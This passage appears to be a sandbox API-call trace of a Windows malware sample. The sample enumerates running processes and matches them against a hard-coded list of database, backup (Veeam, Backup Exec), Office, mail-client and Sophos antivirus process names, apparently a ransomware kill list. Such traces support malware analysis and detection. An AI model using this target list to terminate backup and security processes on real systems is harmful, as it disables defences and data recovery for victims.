cchWideChar=-1, lpMultiByteStr=0x3584b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0166.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0166.382] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0166.382] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0166.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.383] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584c58 [0166.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3584c58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0166.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0166.383] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0166.383] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.385] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584b80 [0166.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3584b80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0166.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0166.385] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0166.385] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0166.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0166.387] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35971c8 [0166.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x35971c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0166.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0166.387] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0166.387] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0166.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.388] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584be0 [0166.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3584be0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0166.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0166.389] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0166.389] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0166.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0166.390] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e428 [0166.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x357e428, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sc.exe", lpUsedDefaultChar=0x0) returned 7 [0166.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="sc.exe" | out: lpString1="sc.exe") returned="sc.exe" [0166.390] StrStrIA (lpFirst="sc.exe", lpSrch="sql") returned 0x0 [0166.390] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 0 [0166.391] CloseHandle (hObject=0x3d4) returned 1 [0166.392] SetEvent (hEvent=0x210) returned 1 [0166.392] Sleep (dwMilliseconds=0x2710) [0176.470] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0176.470] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x370 [0176.495] Process32FirstW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.496] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595708 [0176.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3595708, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0176.496] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0176.496] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0176.497] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.498] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586a90 [0176.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3586a90, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0176.498] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0176.498] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0176.498] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.499] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584d90 [0176.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3584d90, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0176.499] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0176.499] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0176.499] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.500] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584bb0 [0176.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3584bb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0176.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0176.501] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0176.501] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.543] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584dd8 [0176.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3584dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0176.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0176.543] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0176.543] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.544] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584af0 [0176.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3584af0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0176.544] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0176.544] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0176.544] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.545] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584b08 [0176.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3584b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0176.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0176.546] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0176.546] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.547] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584b50 [0176.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3584b50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0176.547] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0176.547] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0176.547] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.548] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584b68 [0176.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3584b68, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0176.548] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0176.548] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0176.548] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.549] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584e20 [0176.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584e20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.550] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.550] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.550] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.551] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3584df0 [0176.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584df0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0176.551] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0176.551] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0176.551] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.552] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3585000 [0176.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585000, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0176.552] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0176.552] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0176.552] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.553] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584fd0 [0176.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.554] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.554] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.554] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0176.555] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3586900 [0176.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3586900, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0176.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0176.555] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0176.555] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.556] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584fa0 [0176.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.556] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.556] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.556] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.558] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585018 [0176.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3585018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.558] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.558] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 